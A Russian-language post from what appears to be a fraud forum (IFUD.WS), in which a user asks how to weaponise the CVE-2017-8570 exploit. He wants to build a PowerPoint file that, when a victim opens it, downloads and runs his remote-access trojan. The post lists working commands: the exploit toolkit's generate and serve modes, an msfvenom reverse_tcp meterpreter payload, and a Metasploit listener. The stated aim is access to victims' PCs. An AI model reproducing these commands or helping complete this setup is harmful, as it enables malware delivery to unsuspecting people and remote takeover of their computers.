1. Этот сайт использует файлы cookie. Продолжая пользоваться данным сайтом, Вы соглашаетесь на использование нами Ваших файлов cookie. Узнать больше.
Приветствуем вас,Гость, на форуме IFUD.WS. Обязательно рекомендуется к прочтению правила форума http://ifud.ws/threads/obnovleno-pravila-foruma.7759

Подскажите как настроить сей эксплоит на линуксе

Тема в разделе "Linux [OS]", создана пользователем mr.whitehead, 11 фев 2018.

  1. TopicStarter Overlay
    mr.whitehead

    mr.whitehead

    Регистрация:
    7 фев 2018
    Сообщения:
    3
    Симпатии:
    0
    Думаю многие слышали об эксплойте Войти или зарегистрироваться, чтобы увидеть ссылку.. Суть эксплойта в том, что создается файл презентации, и вшивается туда загрузчик. Когда жертва запустила файл, у вас в терминале линукса через слушатель открывается доступ к пк жертвы. Так же, более коротко на rus этот эксплоит описан Войти или зарегистрироваться, чтобы увидеть ссылку.. Сидеть и ждать на линуксе мне не удобно, проще вшить билд от ратника.

    Я уже перепробовал многими вариантами, поэтому описывать все моменты, какими командами пробовал и как перенастраивал загрузчик я не буду. Те кто шарит, подскажите просто, как бы сделали вы. И я посмотрю, в чем же была моя ошибка.
    Я взял для примера программу putty(portable). Прямая ссылка Войти или зарегистрироваться, чтобы увидеть ссылку.
    Когда буду вшивать свой билд, я залью его естественно на другой хостинг и там будет другая ссылка. Но так как программа портейбл, то на примере, после загрузки она должна запустится, что сразу даст знать о том, что все работает.


    Вот все команды, если делать вместе со слушателем

    python cve-2017-8570_toolkit.py -M gen -w Invoke.ppsx -u Войти или зарегистрироваться, чтобы увидеть ссылку.
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=ВашАйпи LPORT=4444 -f exe > /tmp/shell.exe
    msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST ВашАйпи; set LPORT 4444; run"
    python cve-2017-8570_toolkit.py -M exp -e Войти или зарегистрироваться, чтобы увидеть ссылку. -l /tmp/shell.exe

    Так как слушатель не нужен, то тут будут только две команды, подскажите как правильно будет прописать их, чтобы сгенерировать ppsx, и после запуска - качался и запускался мой билд по указанной ссылке (Войти или зарегистрироваться, чтобы увидеть ссылку.)
     
    Последнее редактирование: 11 фев 2018

Поделиться этой страницей

Загрузка...